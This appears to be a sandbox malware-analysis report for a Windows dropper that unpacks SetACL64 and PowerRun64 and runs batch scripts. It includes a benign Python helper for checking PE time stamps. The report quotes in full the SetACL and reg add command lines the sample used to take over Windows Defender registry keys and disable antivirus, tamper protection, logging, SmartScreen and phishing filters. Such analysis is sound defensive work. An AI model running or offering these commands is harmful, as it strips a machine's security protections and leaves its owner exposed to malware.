SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: win_version_csharp.exe.0.dr Static PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]
Source: SetACL64.exe.0.dr Static PE information: section name: _RDATA
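The 2097 time stamp above is the TimeDateStamp field of the COFF file header. The Python below, added here as an illustration and not part of the Joe Sandbox report or of the analysed sample, reads that field from a PE image and classifies it; the header bytes it parses are constructed, and the analysis date 2024-07-01 is an assumption. A far-future value is weak evidence on its own: .NET compilers in deterministic mode store a content hash with the high bit set in this field, which always decodes to a date after January 2038, and win_version_csharp.exe is a C# build judging by its PDB path, so that explanation is at least as likely as a deliberately forged stamp.

```python
"""Read a PE file's COFF TimeDateStamp and judge whether it is a plausible build time.

Illustration for the 'suspicious time stamp' finding; the header below is a
constructed fixture, not bytes from the analysed file.
"""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
OLDEST_PLAUSIBLE = 788918400  # 1995-01-01 UTC; nothing still in circulation was built earlier


def pe_timestamp(data: bytes) -> int:
    """Return the 32-bit TimeDateStamp from the COFF file header of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header follows the 4-byte signature: Machine(2), NumberOfSections(2), TimeDateStamp(4)
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def timestamp_to_iso(ts: int) -> str:
    """Render the stamp as ISO-8601 UTC; timedelta avoids fromtimestamp() range limits."""
    return (EPOCH + timedelta(seconds=ts)).isoformat()


def high_bit_set(ts: int) -> bool:
    """Heuristic: Roslyn deterministic builds set bit 31 of the hash they store here."""
    return bool(ts & 0x80000000)


def classify_timestamp(ts: int, now_ts: int) -> str:
    """'zero' (stripped), 'future', 'ancient' or 'plausible' relative to now_ts (Unix seconds)."""
    if ts == 0:
        return "zero"
    if ts > now_ts:
        return "future"  # forged clock, or a deterministic-build hash (see high_bit_set)
    if ts < OLDEST_PLAUSIBLE:
        return "ancient"
    return "plausible"


def build_minimal_pe(timestamp: int) -> bytes:
    """Construct just enough MZ + PE + COFF header to exercise pe_timestamp() (test fixture)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=AMD64, 0 sections, TimeDateStamp, no symbols, no optional header, EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", 0x8664, 0, timestamp, 0, 0, 0, 0x0002)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    # 0xEFE04B64 is the value the report lists for the dropped win_version_csharp.exe
    ts = pe_timestamp(build_minimal_pe(0xEFE04B64))
    analysis_time = 1719792000  # 2024-07-01 UTC, assumed analysis date
    print(hex(ts), timestamp_to_iso(ts), classify_timestamp(ts, analysis_time), high_bit_set(ts))
```

To run it against a real dropped file, pass the file contents to pe_timestamp() instead of the fixture; for a .NET binary, confirm the deterministic-build explanation by checking whether the image carries a CLR header before treating the stamp as evidence of tampering.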

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe (30 instances)
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe (38 instances)
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe File created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe File created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe File created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe File created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe File created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1741DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00007FF7C1741DAC
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe (12 occurrences) Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe (2 occurrences) Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_4-42631)
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe TID: 2548 Thread sleep count: 127 > 30
Source: C:\Windows\SysWOW64\reg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\reg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C40
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00406891 FindFirstFileW,FindClose, 0_2_00406891
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17296D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7C17296D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7C173CF15
Source: SetACL64.exe, 00000008.00000002.2145654108.00000228F7926000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:
Source: SetACL64.exe, 00000008.00000002.2145654108.00000228F7926000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: SetACL64.exe, 00000004.00000002.2140001503.0000013729204000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.2144009034.0000012E75357000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000009.00000002.2146824889.000002B1092D6000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.2151273111.000001F6DF896000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000B.00000002.2152929828.0000027E66337000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000D.00000002.2155754104.000001D50426F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL64.exe, 0000000C.00000002.2154260371.000001F959057000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe API call chain: ExitProcess graph end node (graph_0-3464)
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17486C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7C17486C8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175D744 GetProcessHeap, 4_2_00007FF7C175D744
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17486C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7C17486C8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1742AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF7C1742AE0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1742E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7C1742E8C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1743034 SetUnhandledExceptionFilter, 4_2_00007FF7C1743034
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17380F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17380F6
Source: PowerRun64.exe.0.dr Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175BD40 cpuid 4_2_00007FF7C175BD40
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF7C1756C40
